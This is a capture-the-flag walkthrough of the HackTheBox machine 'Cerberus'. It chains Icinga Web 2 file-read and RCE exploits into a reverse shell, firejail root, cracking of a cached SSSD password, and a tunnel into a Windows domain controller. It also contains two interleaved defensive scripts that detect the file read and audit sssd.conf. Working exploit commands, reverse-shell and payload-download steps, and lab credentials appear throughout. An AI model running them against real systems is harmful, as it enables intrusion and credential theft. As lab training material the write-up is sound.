# HTB - Cerberus

Initial nmap results show a single port open:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nmap -sC -sV -p- --min-rate 1000 -oN nmap/cerberus -Pn $target_ip
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:09 EDT
Nmap scan report for cerberus.local ($target_ip)
Host is up (0.036s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-server-header: Apache/2.4.52 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds
```

This (thanks to the redirect notice) at least enumerated the domain (cerberus.local) and the running service, Icinga, on an eponymous subdomain. Added the domain and subdomain to /etc/hosts:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo vi /etc/hosts

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

# HTB
$target_ip      cerberus.local icinga.cerberus.local
```

Browsing to http://icinga.cerberus.local:8080/icingaweb2 redirects to a login panel: http://icinga.cerberus.local:8080/icingaweb2/authentication/login

![Screenshot of Icinga Admin Portal](https://hackmd.io/_uploads/rkEzDQuE3.png)

Tried the default credentials of **icingaadmin:icinga** found with Google, but no luck. Tried catching the initial request in Burp to try to enumerate the version, as there was nothing obvious in the page source; searchsploit had nothing at all for icinga2 though.
![Screenshot of BurpSuite window showing no version information for Icinga could be obtained from response headers](https://hackmd.io/_uploads/HJNVDm_N2.png)

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ searchsploit icingaweb2
Exploits: No Results
Shellcodes: No Results
```

Threw gobuster at it while searching Google for CVEs, though nothing noteworthy came back (except perhaps that it kept failing to finish the wordlist at around 99% for some reason...). [This](https://portswigger.net/daily-swig/brace-of-icinga-web-vulnerabilities-easily-chained-to-hack-it-monitoring-software) article from PortSwigger stood out, so I had a peek: [CVE-2022-24716](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24716) (Arbitrary File Read) could be patched in the running version, but as I didn't know what version that was yet, I looked for a proof of concept anyway. Found [this](https://raw.githubusercontent.com/doosec101/CVE-2022-24716/main/CVE-2022-24716.py) Python PoC script, but reading through it I decided to just pull out the payload string and try it quickly with cURL for now:

```python
<SNIP>
exploit_url=url+"/lib/icinga/icinga-php-thirdparty"+path
<SNIP>
```

First attempt was (confusingly) successful, as I tried /etc/passwd out of habit and this is supposed to be a Windows box... (WSL or a container?) I'd completely blanked that it was picking the box up as Ubuntu when first going over the nmap scan... 🤦‍♂️
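Detection logic for the file read just described, as an added example that is not part of the writeup or of the PoC: it scans Apache access-log lines (constructed below) for requests that use the icinga-php-thirdparty asset route to reach filesystem paths, which is what a defender watching an unpatched Icinga Web 2 host would alert on. The legitimate-looking asset path and the list of sensitive roots are assumptions.

```python
import re
from urllib.parse import unquote

# Asset route abused by the request above; legitimate requests under it fetch
# bundled JS/CSS, never files from /etc or other filesystem roots.
THIRDPARTY_PREFIX = "/icingaweb2/lib/icinga/icinga-php-thirdparty/"

# Filesystem roots that never hold web assets (assumption: extend per deployment).
SENSITIVE_ROOTS = ("etc/", "proc/", "root/", "home/", "var/", "tmp/", "usr/share/icingaweb2/")

# Apache combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one normal login request, two file reads matching the
# writeup's cURL requests, one legitimate-looking asset fetch (hypothetical
# path) and one URL-encoded traversal attempt that the server refused.
SAMPLE_LOG = """\
10.10.14.76 - - [30/Apr/2023:12:01:03 +0000] "GET /icingaweb2/authentication/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.76 - - [30/Apr/2023:12:02:11 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 2311 "-" "curl/7.88.1"
10.10.14.76 - - [30/Apr/2023:12:02:40 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini HTTP/1.1" 200 210 "-" "curl/7.88.1"
10.10.14.76 - - [30/Apr/2023:12:03:05 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/vendor/example/asset.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.10.14.76 - - [30/Apr/2023:12:03:30 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 403 199 "-" "curl/7.88.1"
"""


def classify_path(raw_path):
    """Return a reason string when the request path reads a filesystem file
    through the asset route, or None for anything else."""
    path = raw_path.split("?", 1)[0]
    # Decode twice so a double-encoded "%252e%252e" does not slip past the check.
    path = unquote(unquote(path))
    if not path.startswith(THIRDPARTY_PREFIX):
        return None
    rest = path[len(THIRDPARTY_PREFIX):]
    if ".." in rest.split("/"):
        return "dot-dot traversal under asset route"
    for root in SENSITIVE_ROOTS:
        if rest.startswith(root):
            return f"filesystem path '/{root}' requested via asset route"
    return None


def scan_log(text):
    """Return one finding per suspicious line; a 200 status means the read
    succeeded, anything else means it was attempted but refused."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_path(m["path"])
        if reason is None:
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": unquote(unquote(m["path"])),
            "status": int(m["status"]),
            "succeeded": m["status"] == "200",
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {f['path']}  # {f['reason']}")
```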
```bash
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
```

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin
```

Checked out the [Icinga2
Documentation](https://icinga.com/docs/icinga-web/latest/doc/03-Configuration/) to see what useful files I might be able to grab with this vuln. 'config.ini' and 'resources.ini' certainly seem like they'd be worth a look:

```
config.ini      General configuration (global, logging, themes, etc.)
resources.ini   Global resources (Icinga Web 2 database for preferences and authentication, Icinga 2 IDO database)
```

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"

[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"

[themes]

[authentication]

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"                  <--- Nice
password = "IcingaWebPassword2023"    <--- Nicer
use_ssl = "0"
```

```bash
echo 'matthew:IcingaWebPassword2023' >> loot/creds.txt
```

Going back to the browser, I can log in to the admin panel:

![Screenshot showing successful authentication to the Admin Panel for Icinga2](https://hackmd.io/_uploads/rkTsDQ_Nn.png)

Also now know the exact service version:

![Screenshot showing service version enumeration](https://hackmd.io/_uploads/Hky0wmdE2.png)

Vulnerable to [CVE-2022-24715](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24715) (Authenticated Remote Code Execution) next, with another proof of concept script [here](https://raw.githubusercontent.com/JacobEbben/CVE-2022-24715/main/exploit.py). Tried messing around with it manually via Burp and the web app for a while by adding a user and an SSH key according to
[this](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)...

![Screenshot of graphical explanation of Icinga Web Interface Vuln from SonarSource](https://hackmd.io/_uploads/HkvtTE_E3.png)

...but it was giving me too much lip: first issues with the key format (not using a passphrase when generating it seemed to be the resolution here, but NFI why; an encoding issue, I think). After getting over that hurdle I just couldn't seem to execute any PHP code with it; again, I would assume an encoding issue.

![Screenshot of Add SSH Identity](https://hackmd.io/_uploads/rJ-g6EOE2.png)

![Screenshot of Add User](https://hackmd.io/_uploads/B1YJ6NdN3.png)

Knowing there was likely a much easier route, I went for the above PoC script... don't really understand why this was any better than the manual method, because it seemed to be doing the exact same thing:

![Screenshot of source code for Python exploit](https://hackmd.io/_uploads/By2mJB_En.png)

:man-shrugging:

Needed an SSH key in PEM format either way, so:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ ssh-keygen -t rsa -m PEM -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:oSBt+tCEuHfEfDQ/+t/v7k0PIa886eoIgZ3IEWKMw+I kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|.oo . o          |
|++.* o o         |
|+.o X . +        |
| E O B + o       |
|. + * * S . .    |
| . + o o .       |
|  . . . .o .     |
|   . o oo. +.    |
|    ..+o=*= o    |
+----[SHA256]-----+
```

Fired up netcat on 9001 to catch my shell...

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
```

...and executed the [CVE-2022-24715](https://raw.githubusercontent.com/JacobEbben/CVE-2022-24715/main/exploit.py) PoC script in another terminal:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.76 -P 9001 -u matthew -p IcingaWebPassword2023 -e key
[INFO] Attempting to login to the Icinga Web 2 instance...
[INFO] Attempting to upload our malicious module...
[SUCCESS] The payload appears to be uploaded successfully!
[INFO] Modifying configurations...
[INFO] Attempting to enable the malicious module...
[INFO] Trying to trigger payload! Have a listener ready!
[SUCCESS] It appears that a reverse shell was started!
[INFO] Removing malicious module file...
[INFO] Disabling malicious module...
[INFO] Resetting website configuration...
[SUCCESS] Cleanup successful! Shutting down...
[ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings!

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$
```

Had Python3 available on the box, so did the usual trick to get a fully interactive TTY:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.76] from (UNKNOWN) [$target_ip] 49874
bash: cannot set terminal process group (630): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ which python
which python
www-data@icinga:/usr/share/icingaweb2/public$ which python3
which python3
/usr/bin/python3
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended  nc -lvnp 9001

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1]  + continued  nc -lvnp 9001
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
```

Stood up a local web server to get [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) onto the machine to look for PrivEsc vectors:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$target_ip - - [30/Apr/2023 15:09:21] "GET /linpeas.sh HTTP/1.1" 200 -
```

![Screenshot of LinPEAS starting execution](https://hackmd.io/_uploads/rkSfO7u43.png)

LinPEAS doesn't think we're in a container... interesting.

```bash
-rwsr-xr-x 1 root root 464K Jan 19  2022 /usr/bin/firejail (Unknown SUID binary!)    <---- This is worth a look though...
```

Googled for 'firejail' and there's yet another CVE with a PoC script that can be leveraged to get root on the Linux container (which I assume is just this firejail now). Read through the explanation of CVE-2022-31214 'FireJoin' [here](https://seclists.org/oss-sec/2022/q2/188) and made use of [this](https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin) proof of concept script linked at the end of the article (needed to change the extension to .py).
```bash
www-data@icinga:/dev/shm$ curl http://10.10.14.76/firejoin.py -o firejoin.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8651  100  8651    0     0   138k      0 --:--:-- --:--:-- --:--:--  140k
www-data@icinga:/dev/shm$ ls
firejoin.py  linpeas.sh
www-data@icinga:/dev/shm$ file firejoin.py
firejoin.py: Python script, ASCII text executable
www-data@icinga:/dev/shm$ python3 firejoin.py
/dev/shm/firejoin.py needs to have the execute bit set for the exploit to work. Run `chmod +x /dev/shm/firejoin.py` and try again.
www-data@icinga:/dev/shm$ chmod +x firejoin.py && python3 firejoin.py
You can now run 'firejail --join=19941' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
```

Fired up another reverse shell with the same method as before, on another port:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.194.21] 49870
bash: cannot set terminal process group (622): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended  nc -lvnp 9002

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1]  + continued  nc -lvnp 9002
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=19941
changing root to /proc/19941/root
Warning: cleaning all supplementary groups
Child process initialized in 13.65 ms
www-data@icinga:/usr/share/icingaweb2/public$ su -
root@icinga:~#
```

Got root; still no flags though, so nowhere near done... after some flapping about in the wind, checked out /etc/hosts...
```bash
root@icinga:~# cat /etc/hosts
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local    <--- ...revealing this.

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@icinga:~#
```

Looking through the LinPEAS output again... I'd re-run it as root just in case, not sure if it made a difference, or if I'd just not picked up on it the first time *(note to self: learn to save output)*, but this eventually stood out, being domain related n'all...

```bash
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam

[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad

-rw-r--r-- 1 root root 169 Oct  4  2022 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils
```

Almost certainly what we want to target to get onto the Windows machine (172.16.22.1), and some Googling only added confirmation: [SSSD Documentation](https://sssd.io/docs/introduction.html)

```bash
cache_credentials = True    <--- Sounds particularly juicy... wonder where the cache is...
```

Eventually found it with some

```bash
find / | grep -i sss
```

```bash
root@icinga:/var/lib/sss/db# ls
cache_cerberus.local.ldb  config.ldb  timestamps_cerberus.local.ldb
ccache_CERBERUS.LOCAL     sssd.ldb
root@icinga:/var/lib/sss/db#
```

Binary format, but can 'strings' it well enough...
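The cache directory listed above only exists because of the sssd.conf settings LinPEAS surfaced. As an added defender's check that is not part of the writeup, this audits that configuration (embedded below as a constructed sample) and flags the options that leave a crackable copy of a domain password on the joined host; the option semantics follow sssd.conf(5), while the severity labels and the hardened variant are the reviewer's assumptions.

```python
import configparser

# Constructed sample reproducing the sssd.conf that LinPEAS surfaced above.
SAMPLE_SSSD_CONF = """\
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam

[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
"""

# The same file with both offline-credential settings turned off
# (reviewer's hardened version, not taken from the box).
HARDENED_SSSD_CONF = SAMPLE_SSSD_CONF.replace(
    "krb5_store_password_if_offline = True", "krb5_store_password_if_offline = False"
).replace("cache_credentials = True", "cache_credentials = False")


def _truthy(value):
    """sssd boolean as understood here: true/yes/1, case-insensitive."""
    return value.strip().lower() in ("true", "yes", "1")


def audit_sssd_conf(text):
    """Return a list of findings for settings that leave a domain password
    (or a crackable hash of it) on the joined host."""
    # Values such as /home/%u@%d are sssd templates, not configparser interpolation.
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    findings = []
    for section in cfg.sections():
        if not section.startswith("domain/"):
            continue
        domain = section.split("/", 1)[1]
        if _truthy(cfg.get(section, "cache_credentials", fallback="false")):
            findings.append({
                "section": section, "key": "cache_credentials", "severity": "high",
                "detail": (f"sha512crypt hashes of {domain} passwords are written to "
                           f"/var/lib/sss/db/cache_{domain}.ldb; root on this host can "
                           "crack them offline, as shown in this writeup"),
                "fix": "cache_credentials = False unless offline logon is required; "
                       "if it is, set offline_credentials_expiration in [pam]",
            })
            # With caching on, the hashes persist until [pam] expires them.
            expiry = cfg.get("pam", "offline_credentials_expiration", fallback="0")
            if expiry.strip() == "0":
                findings.append({
                    "section": "pam", "key": "offline_credentials_expiration", "severity": "medium",
                    "detail": "cached credentials never expire (default 0 days)",
                    "fix": "offline_credentials_expiration = <days> in [pam]",
                })
        if _truthy(cfg.get(section, "krb5_store_password_if_offline", fallback="false")):
            findings.append({
                "section": section, "key": "krb5_store_password_if_offline", "severity": "high",
                "detail": "the plaintext password is kept in the kernel keyring while the KDC is unreachable",
                "fix": "krb5_store_password_if_offline = False",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sssd_conf(SAMPLE_SSSD_CONF):
        print(f"[{f['severity']}] [{f['section']}] {f['key']}: {f['detail']} -> {f['fix']}")
```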
```bash
root@icinga:/var/lib/sss/db# file cache_cerberus.local.ldb
cache_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes
root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb
```

```bash
<SNIP>
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
<SNIP>
```

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo '$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0' >> hash

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
147258369        (?)
1g 0:00:00:00 DONE (2023-04-30 13:06) 2.500g/s 1280p/s 1280c/s 1280C/s jeffrey..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$
```

Nice...

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo "matthew:147258369" >> loot/creds.txt
```

Need to look for something running on the DC that we can pivot to... try dropping a [compiled nmap for win32](https://github.com/opsec-infosec/nmap-static-binaries/releases/tag/v2) onto the box:

```bash
root@icinga:/dev/shm# wget http://10.10.14.76/nmap-x64.tar.gz
--2023-04-30 21:30:13--  http://10.10.14.76/nmap-x64.tar.gz
Connecting to 10.10.14.76:80... connected.
HTTP request sent, awaiting response...
200 OK
Length: 10686789 (10M) [application/gzip]
Saving to: 'nmap-x64.tar.gz'

nmap-x64.tar.gz     100%[===================>]  10.19M   463KB/s    in 30s

2023-04-30 21:30:43 (350 KB/s) - 'nmap-x64.tar.gz' saved [10686789/10686789]
```

```bash
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:15:5D:5F:E8:00 (Microsoft)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

WinRM... but first we'll need to tunnel with [chisel](https://github.com/jpillora/chisel/releases). The attacking machine is the server, in reverse mode:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 8888 --reverse
```

And on the Linux box:

```bash
./chisel client --max-retry-count=1 10.10.14.76:8888 R:5985:172.16.22.1:5985
```

*You can search for 'chisel' on [ippsec.rocks](https://ippsec.rocks/) for good explanations of all this tunnelling business (an awesome resource in general any time you're stuck but have some keywords you can throw at it).*

```bash
2023/04/30 17:57:32 server: Reverse tunnelling enabled
2023/04/30 17:57:32 server: Fingerprint 7oPtF2heLbHEu0624ToKDh1dQ/bUjiTB03h+EDZHmds=
2023/04/30 17:57:32 server: Listening on http://0.0.0.0:8888
2023/04/30 17:57:36 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening
```

Then in another terminal on the attacking box:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\matthew\Documents> whoami
cerberus\matthew
*Evil-WinRM* PS C:\Users\matthew\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\matthew\Desktop> ls


    Directory: C:\Users\matthew\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         4/30/2023  12:29 PM             34 user.txt


*Evil-WinRM* PS C:\Users\matthew\Desktop> type user.txt
f2f8d9bec0fd854c4fee75e0a37594df
*Evil-WinRM* PS C:\Users\matthew\Desktop>
```

Finally have User... 😌

Grabbed [WinPEAS](https://github.com/carlospolop/PEASS-ng/releases/tag/20230425-bd7331ea) to look for a PrivEsc vector from here, and uploaded it to the box through Evil-WinRM:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\matthew\Documents> upload winPEASany.exe

Info: Uploading /home/kali/HackTheBox/Machines/Cerberus/tools/winPEASany.exe to C:\Users\matthew\Documents\winPEASany.exe

Data: 2703360 bytes of 2703360 bytes copied

Info: Upload successful!
```

![Screenshot of WinPEAS.exe starting enumeration](https://hackmd.io/_uploads/rJlVnVOEn.png)

Spent a while gawping at the WinPEAS output, with nothing really jumping out at me initially, but there is "ManageEngine", which is non-standard, and on inspection seemed AD related, so Googled it and found that there's *yet another* public vulnerability: [CVE-2022-47966](https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html)

```powershell
*Evil-WinRM* PS C:\Users\matthew\Documents> cd "C:/Program Files (x86)"
*Evil-WinRM* PS C:\Program Files (x86)> ls


    Directory: C:\Program Files (x86)


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/15/2018  12:28 AM                Common Files
d-----          5/1/2023   4:08 AM                Google
d-----          9/7/2022   4:34 AM                Internet Explorer
d-----         1/29/2023  11:12 AM                ManageEngine    <---
d-----         9/15/2018  12:19 AM                Microsoft.NET
d-----         8/24/2021   7:47 AM                Windows Defender
d-----         8/24/2021   7:47 AM                Windows Mail
d-----          9/7/2022   4:34 AM                Windows Media Player
d-----         9/15/2018  12:19 AM                Windows Multimedia Platform
d-----         9/15/2018  12:28 AM                windows nt
d-----         8/24/2021   7:47 AM                Windows Photo Viewer
d-----         9/15/2018  12:19 AM                Windows Portable Devices
d-----         9/15/2018  12:19 AM                WindowsPowerShell
```

It's only listening locally on the Windows box though... which means another pivot 😱
```powershell
*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -anop TCP

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:808            0.0.0.0:0              LISTENING       5552
  TCP    0.0.0.0:1500           0.0.0.0:0              LISTENING       5552
  TCP    0.0.0.0:1501           0.0.0.0:0              LISTENING       5552
  TCP    0.0.0.0:2179           0.0.0.0:0              LISTENING       3424
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       5756
  TCP    0.0.0.0:9251           0.0.0.0:0              LISTENING       5756    <--- ManageEngine listening locally on 9251
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2016
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49459          0.0.0.0:0              LISTENING       3136
```

The listening port was found [here](https://download.manageengine.com/products/self-service-password/securely-deploy-adselfservice-plus-over-the-internet-for-remote-users.pdf) after some searching.
Get another chisel server going on the attack box:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 9999 --reverse
2023/05/01 08:45:17 server: Reverse tunnelling enabled
